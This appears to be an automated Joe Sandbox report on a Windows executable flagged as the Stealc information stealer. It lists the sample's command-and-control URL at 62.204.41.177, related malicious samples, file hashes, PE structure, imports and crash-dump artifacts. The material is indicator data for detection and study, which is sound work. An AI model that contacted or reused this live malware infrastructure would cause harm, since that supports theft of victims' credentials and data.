                              http://62.204.41.177/edd20096ecef326d.phpsktopoqIz1tfl5h.exe, 00000006.00000002.1601026271.0000000002E5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://62.204.41.177/edd20096ecef326d.php4oqIz1tfl5h.exe, 00000006.00000002.1601026271.0000000002E5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://62.204.41.177/edd20096ecef326d.phpToqIz1tfl5h.exe, 00000006.00000002.1601026271.0000000002E5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://62.204.41.177/owsoqIz1tfl5h.exe, 00000006.00000002.1601026271.0000000002E5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      http://62.204.41.177oqIz1tfl5h.exe, 00000006.00000002.1601026271.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, oqIz1tfl5h.exe, 00000006.00000002.1600926236.0000000002DEE000.00000004.00000020.00020000.00000000.sdmptrue
                                        unknown
                                        http://62.204.41.177/edd20096ecef326d.phptBWXoqIz1tfl5h.exe, 00000006.00000002.1601026271.0000000002E24000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          62.204.41.177
                                          unknownUnited Kingdom
                                          30798TNNET-ASTNNetOyMainnetworkFItrue
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1542868
                                          Start date and time:2024-10-26 19:02:04 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 4m 47s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:18
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:oqIz1tfl5h.exe
                                          renamed because original name is a hash value
                                          Original Sample Name:085de763171fbbafeac2cdb972aacc2a.exe
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@2/5@0/1
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 23
                                          • Number of non-executed functions: 165
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 52.168.117.173
                                          • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, onedsblobprdeus16.eastus.cloudapp.azure.com, otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                          • Not all processes where analyzed, report is missing behavior information
                                          • VT rate limit hit for: oqIz1tfl5h.exe
                                          TimeTypeDescription
                                          14:39:15API Interceptor1x Sleep call for process: WerFault.exe modified
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          62.204.41.177jicQJ2cdlM.exeGet hashmaliciousStealcBrowse
                                          • 62.204.41.177/edd20096ecef326d.php
                                          c4da1217278a52b300055859db330a4a3dca4ad09fe56.exeGet hashmaliciousStealcBrowse
                                          • 62.204.41.177/edd20096ecef326d.php
                                          w12rykWq2L.exeGet hashmaliciousStealcBrowse
                                          • 62.204.41.177/edd20096ecef326d.php
                                          jWpgP22dl2.exeGet hashmaliciousStealcBrowse
                                          • 62.204.41.177/edd20096ecef326d.php
                                          mCe4hBfqCT.exeGet hashmaliciousStealcBrowse
                                          • 62.204.41.177/edd20096ecef326d.php
                                          Ondso1o6Yz.exeGet hashmaliciousStealcBrowse
                                          • 62.204.41.177/edd20096ecef326d.php
                                          BKoQ3DF8eD.exeGet hashmaliciousStealcBrowse
                                          • 62.204.41.177/edd20096ecef326d.php
                                          ZDW7Di1Ykf.exeGet hashmaliciousStealc, VidarBrowse
                                          • 62.204.41.177/edd20096ecef326d.php
                                          cdc57Mn7dE.exeGet hashmaliciousStealcBrowse
                                          • 62.204.41.177/edd20096ecef326d.php
                                          v2hvYA53Ys.exeGet hashmaliciousStealcBrowse
                                          • 62.204.41.177/edd20096ecef326d.php
                                          No context
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          TNNET-ASTNNetOyMainnetworkFIjicQJ2cdlM.exeGet hashmaliciousStealcBrowse
                                          • 62.204.41.177
                                          c4da1217278a52b300055859db330a4a3dca4ad09fe56.exeGet hashmaliciousStealcBrowse
                                          • 62.204.41.177
                                          w12rykWq2L.exeGet hashmaliciousStealcBrowse
                                          • 62.204.41.177
                                          jWpgP22dl2.exeGet hashmaliciousStealcBrowse
                                          • 62.204.41.177
                                          mCe4hBfqCT.exeGet hashmaliciousStealcBrowse
                                          • 62.204.41.177
                                          Ondso1o6Yz.exeGet hashmaliciousStealcBrowse
                                          • 62.204.41.177
                                          BKoQ3DF8eD.exeGet hashmaliciousStealcBrowse
                                          • 62.204.41.177
                                          ZDW7Di1Ykf.exeGet hashmaliciousStealc, VidarBrowse
                                          • 62.204.41.177
                                          cdc57Mn7dE.exeGet hashmaliciousStealcBrowse
                                          • 62.204.41.177
                                          v2hvYA53Ys.exeGet hashmaliciousStealcBrowse
                                          • 62.204.41.177
                                          No context
                                          No context
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):0.964127260011088
                                          Encrypted:false
                                          SSDEEP:192:1EJUiFyD0Qv+AUwjMhZrMZtzuiFJZ24IO86l:OJUiFywQv+AUwjjTzuiFJY4IO86
                                          MD5:285B6B1BC77C2F5234BF287AF805E608
                                          SHA1:427CD417C4FE4A551C1D3F2F9F0A4F260314FF8F
                                          SHA-256:0D72BEC9A085E7A7EBB94C0EE26C46C675643F27D65BB82EB51C3372C6B9D371
                                          SHA-512:F58CB3F4B331298C926629C84628F8A9D1C5F4B0F772684172836E3F147566C90FEF4254A3B685363E2E7534F183B0E85BEA51A2847E24EA0B33DB48C10B6A64
                                          Malicious:true
                                          Reputation:low
                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.4.3.5.7.9.0.8.8.8.7.5.1.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.4.3.5.7.9.1.4.2.0.0.1.5.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.c.8.4.7.b.e.6.-.2.d.b.6.-.4.6.4.2.-.b.4.6.4.-.c.4.0.d.1.1.0.1.4.8.c.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.9.4.4.4.f.c.0.-.1.8.4.e.-.4.c.2.1.-.8.a.b.6.-.b.d.4.4.f.1.8.8.6.1.b.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.o.q.I.z.1.t.f.l.5.h...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.d.c.-.0.0.0.1.-.0.0.1.4.-.7.8.a.8.-.c.e.e.9.c.8.2.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.3.6.f.3.0.5.b.a.c.7.1.b.d.5.d.3.0.3.d.e.b.8.6.6.6.3.9.4.5.d.f.0.0.0.0.f.f.f.f.!.0.0.0.0.e.4.7.6.2.c.6.9.c.5.d.8.4.e.5.6.f.b.3.8.6.f.a.c.5.6.0.1.5.d.3.f.5.8.3.5.1.f.9.b.!.o.q.I.z.1.t.f.l.5.h...e.x.e.....T.a.r.g.e.t.A.p.p.
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Mini DuMP crash report, 14 streams, Sat Oct 26 17:03:11 2024, 0x1205a4 type
                                          Category:dropped
                                          Size (bytes):60428
                                          Entropy (8bit):1.9127199341615395
                                          Encrypted:false
                                          SSDEEP:384:nsB6FtEEErHsP4M0FZ7EfMmQIUACio6inPt:nk6FqEEU4FZvEiPt
                                          MD5:E9A67660D773B5661C13D50F168F8197
                                          SHA1:BC0F81A91B06BDA91F422380898F8CD3562A1EE3
                                          SHA-256:30B7EDFF1FAAEA9928A18E5040D64BD10BDA784FE24A881D1ED3B92A25ADE36B
                                          SHA-512:CBCFA99E4C08D4FFEB1CBE56B901FC7E761CF84C3529B1ABC0C6AF2EDC1F6DC7318E6B310FAB59DA40012455377B2531DD04F061E7A12F2D521B25BB925F92C6
                                          Malicious:false
                                          Reputation:low
                                          Preview:MDMP..a..... ........ .g............4...............<............*..........T.......8...........T............2..4.......................................................................................................eJ......H.......GenuineIntel............T............ .g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):8342
                                          Entropy (8bit):3.6981002295726992
                                          Encrypted:false
                                          SSDEEP:192:R6l7wVeJgjJ6m6YNxSU9LZgmfxHpDj89b2SsfAbSm:R6lXJKJ6m6YrSU9LZgmfxW2RfAP
                                          MD5:4E4AD3819CE0CC58D1F11B6443A1B87C
                                          SHA1:D470891CB95D8BC8EDAD1CC61F71F45C9AE7DAE5
                                          SHA-256:38CDF37CCBB87E42263A60C01A1115F428FF253E0D7B2EAC9B4C8D499FCB259A
                                          SHA-512:8D51328159B94A1C4A157EA02D946911938855B788B13CBF7A29E7AC63D0F4E54BD00006620D65EDD4202254D94941CF153E8F53BBB5BC5999289724E41E0AB5
                                          Malicious:false
                                          Reputation:low
                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.8.2.8.<./.P.i.
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):4579
                                          Entropy (8bit):4.4577672100302825
                                          Encrypted:false
                                          SSDEEP:48:cvIwWl8zsIJg77aI9iNWpW8VY1Ym8M4JUW3rd6F9C+q8fpCGd/5rYVNVkd:uIjfOI7I87VRJUW7dXkphx5rYVNVkd
                                          MD5:7E7A71BAB1CC12490907D5E1EBCA76F9
                                          SHA1:5390DD9B70361A6ABA92217EF1CFB5EAB3327E56
                                          SHA-256:6BBFE560D56C632CA2B9BEE297D03E888745FD24D0F856D427120047C327DE5C
                                          SHA-512:2A8DCC37524A6A8E96899A5133CBECE83871AC9F15A0F5E0380E47E1E0B63CEADEB5B5BB7F5F30A7B15ADA1FA871EA044BCA583C397C8997F920DE2A25329D04
                                          Malicious:false
                                          Reputation:low
                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="560645" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:MS Windows registry file, NT/2000 or above
                                          Category:dropped
                                          Size (bytes):1835008
                                          Entropy (8bit):4.4167045042267405
                                          Encrypted:false
                                          SSDEEP:6144:ycifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNF5+:fi58oSWIZBk2MM6AFBzo
                                          MD5:194A67C7F9B75C10004196AD581FFD6D
                                          SHA1:488DE2FA20FBAEEE5904419424AB8688B3252BBD
                                          SHA-256:DD4BB97BFC3E038BA15D91D1B52298F46889E32CB274E4087F6512982FF7E61F
                                          SHA-512:F975B3F3BA204A9F6BA0CE34388D32A6EB026FD40F082BDBA76E199C8CCCE64053823A81A523FD910CFA7A35257A7C778FEA8B46974DA9EB2C0A71E2D48092A2
                                          Malicious:false
                                          Reputation:low
                                          Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....'...............................................................................................................................................................................................................................................................................................................................................'..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Entropy (8bit):6.6214870089703375
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.53%
                                          • InstallShield setup (43055/19) 0.43%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:oqIz1tfl5h.exe
                                          File size:402'432 bytes
                                          MD5:085de763171fbbafeac2cdb972aacc2a
                                          SHA1:e4762c69c5d84e56fb386fac56015d3f58351f9b
                                          SHA256:dd4a5efc48bbd0ed6ad6aab7220cab9f5bf0ff1fd47f5594ba67ae122cbf026f
                                          SHA512:9de251fede114a679632377677751f7427c03865aabf2a6733ac22b9ae03e76645da2bd626c55345acdfe5caf704a2dba475b1b7ff911afd38061cd13ca344ac
                                          SSDEEP:6144:aLoOrrA59Zbm4mbZJSeWnFcmw4iD8VYwmAgFl7gVWbfonBeao:a5r2Dbm4mbJWnFoYVrVWbfy
                                          TLSH:14846C2161F2A812EAB76B314B3BD6DCE96BBC52DE39525E61143E0F18733B18D12713
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................j................................&......................................Rich............................PE..L..
                                          Icon Hash:351a131010921409
                                          Entrypoint:0x40171e
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                          Time Stamp:0x65B8FE3E [Tue Jan 30 13:48:46 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:5
                                          OS Version Minor:0
                                          File Version Major:5
                                          File Version Minor:0
                                          Subsystem Version Major:5
                                          Subsystem Version Minor:0
                                          Import Hash:cbc36328d263fa38227906375f79757a
                                          Instruction
                                          call 00007FDEED16F46Eh
                                          jmp 00007FDEED16BF4Eh
                                          mov edi, edi
                                          push ebp
                                          mov ebp, esp
                                          sub esp, 00000328h
                                          mov dword ptr [00440780h], eax
                                          mov dword ptr [0044077Ch], ecx
                                          mov dword ptr [00440778h], edx
                                          mov dword ptr [00440774h], ebx
                                          mov dword ptr [00440770h], esi
                                          mov dword ptr [0044076Ch], edi
                                          mov word ptr [00440798h], ss
                                          mov word ptr [0044078Ch], cs
                                          mov word ptr [00440768h], ds
                                          mov word ptr [00440764h], es
                                          mov word ptr [00440760h], fs
                                          mov word ptr [0044075Ch], gs
                                          pushfd
                                          pop dword ptr [00440790h]
                                          mov eax, dword ptr [ebp+00h]
                                          mov dword ptr [00440784h], eax
                                          mov eax, dword ptr [ebp+04h]
                                          mov dword ptr [00440788h], eax
                                          lea eax, dword ptr [ebp+08h]
                                          mov dword ptr [00440794h], eax
                                          mov eax, dword ptr [ebp-00000320h]
                                          mov dword ptr [004406D0h], 00010001h
                                          mov eax, dword ptr [00440788h]
                                          mov dword ptr [00440684h], eax
                                          mov dword ptr [00440678h], C0000409h
                                          mov dword ptr [0044067Ch], 00000001h
                                          mov eax, dword ptr [0043F004h]
                                          mov dword ptr [ebp-00000328h], eax
                                          mov eax, dword ptr [0043F008h]
                                          mov dword ptr [ebp-00000324h], eax
                                          call dword ptr [000000ECh]
                                          Programming Language:
                                          • [C++] VS2008 build 21022
                                          • [ASM] VS2008 build 21022
                                          • [ C ] VS2008 build 21022
                                          • [IMP] VS2005 build 50727
                                          • [RES] VS2008 build 21022
                                          • [LNK] VS2008 build 21022
                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3dbec0x3c.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x27460000x20570.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x3c0000x1b4.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x3a24c0x3a40038c9241b6c71c2bfe3e7d96c002dbc6cFalse0.8220770185085837data7.4826108141905285IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rdata0x3c0000x25ca0x26008f9907df33d9b88b3d3e75b385ad00aeFalse0.38456003289473684data5.515859570738161IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0x3f0000x27014780x18006b7e1cc8272c94f3fc913a24bbe126beunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .weririt0x27410000x44000x3800b211778b80f6d441b6cf61ada776fc6dFalse0.0025809151785714285data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rsrc0x27460000x205700x20600c716c9901abfd2ce2a85a0bc73b9af45False0.4092136221042471data4.91317015110922IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_CURSOR0x275e6600x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                          RT_CURSOR0x275e7900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                          RT_ICON0x2746b100xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5565031982942431
                                          RT_ICON0x27479b80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6304151624548736
                                          RT_ICON0x27482600x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.6762672811059908
                                          RT_ICON0x27489280x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.736271676300578
                                          RT_ICON0x2748e900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.5033195020746888
                                          RT_ICON0x274b4380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.5968574108818011
                                          RT_ICON0x274c4e00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.5926229508196721
                                          RT_ICON0x274ce680x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.7331560283687943
                                          RT_ICON0x274d3480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.3358208955223881
                                          RT_ICON0x274e1f00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.39395306859205775
                                          RT_ICON0x274ea980x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.3957373271889401
                                          RT_ICON0x274f1600x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.4060693641618497
                                          RT_ICON0x274f6c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.22095435684647302
                                          RT_ICON0x2751c700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.24835834896810507
                                          RT_ICON0x2752d180x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.28647540983606556
                                          RT_ICON0x27536a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.3147163120567376
                                          RT_ICON0x2753b800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.39019189765458423
                                          RT_ICON0x2754a280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5464801444043321
                                          RT_ICON0x27552d00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6094470046082949
                                          RT_ICON0x27559980x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6401734104046243
                                          RT_ICON0x2755f000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.4101782363977486
                                          RT_ICON0x2756fa80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.39959016393442626
                                          RT_ICON0x27579300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.44858156028368795
                                          RT_ICON0x2757e000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.34168443496801704
                                          RT_ICON0x2758ca80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.46886281588447654
                                          RT_ICON0x27595500x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.5046082949308756
                                          RT_ICON0x2759c180x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.5223988439306358
                                          RT_ICON0x275a1800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.425
                                          RT_ICON0x275c7280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.4343339587242026
                                          RT_ICON0x275d7d00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.43483606557377047
                                          RT_ICON0x275e1580x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.4530141843971631
                                          RT_STRING0x2760f100x9adata0.6038961038961039
                                          RT_STRING0x2760fb00x6dadata0.4264538198403649
                                          RT_STRING0x27616900x4aadata0.4455611390284757
                                          RT_STRING0x2761b400x4dcdata0.4429260450160772
                                          RT_STRING0x27620200x7d4data0.41966067864271456
                                          RT_STRING0x27627f80x718data0.42841409691629956
                                          RT_STRING0x2762f100x696data0.4359430604982206
                                          RT_STRING0x27635a80x616data0.43902439024390244
                                          RT_STRING0x2763bc00x7dedata0.41807348560079444
                                          RT_STRING0x27643a00x5c6data0.4370771312584574
                                          RT_STRING0x27649680x5d8data0.44385026737967914
                                          RT_STRING0x2764f400x588data0.4392655367231638
                                          RT_STRING0x27654c80x616data0.43838254172015406
                                          RT_STRING0x2765ae00x4eedata0.4548335974643423
                                          RT_STRING0x2765fd00x5a0data0.4354166666666667
                                          RT_ACCELERATOR0x275e6380x28data1.025
                                          RT_GROUP_CURSOR0x2760d380x22data1.0588235294117647
                                          RT_GROUP_ICON0x275e5c00x76dataTurkishTurkey0.6694915254237288
                                          RT_GROUP_ICON0x274d2d00x76dataTurkishTurkey0.6610169491525424
                                          RT_GROUP_ICON0x2757d980x68dataTurkishTurkey0.7211538461538461
                                          RT_GROUP_ICON0x2753b080x76dataTurkishTurkey0.6694915254237288
                                          RT_VERSION0x2760d600x1b0data0.5856481481481481
                                          DLLImport
                                          KERNEL32.dllGetComputerNameA, GetNumaNodeProcessorMask, GetNumaProcessorNode, GetLocaleInfoA, CallNamedPipeA, DeleteVolumeMountPointA, InterlockedIncrement, MoveFileExW, SetDefaultCommConfigW, GetEnvironmentStringsW, GlobalLock, GetTimeFormatA, SetCommBreak, FreeEnvironmentStringsA, GetModuleHandleW, FormatMessageA, CopyFileW, GetSystemWow64DirectoryW, GetVersionExW, GlobalFlags, HeapCreate, GetNamedPipeInfo, GetConsoleAliasW, GetFileAttributesW, GetBinaryTypeA, GetModuleFileNameW, GetConsoleFontSize, IsBadStringPtrA, WritePrivateProfileStringW, GetStringTypeExA, LCMapStringA, GetStdHandle, SetLastError, GetProcAddress, GetLongPathNameA, LoadLibraryA, UnhandledExceptionFilter, InterlockedExchangeAdd, OpenWaitableTimerW, LocalAlloc, SetCalendarInfoW, MoveFileA, SetCommMask, GetOEMCP, BuildCommDCBA, FatalAppExitA, FindAtomW, ReadConsoleOutputCharacterW, OpenFileMappingA, LocalFree, LocalFileTimeToFileTime, CreateFileA, CloseHandle, MultiByteToWideChar, HeapAlloc, GetStartupInfoW, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCPInfo, InterlockedDecrement, GetACP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, GetLastError, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, HeapSize, FreeEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, WideCharToMultiByte, LCMapStringW, GetStringTypeA, GetStringTypeW, InitializeCriticalSectionAndSpinCount, RtlUnwind, SetFilePointer, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, GetModuleHandleA
                                          WINHTTP.dllWinHttpOpenRequest
                                          Language of compilation systemCountry where language is spokenMap
                                          TurkishTurkey
                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
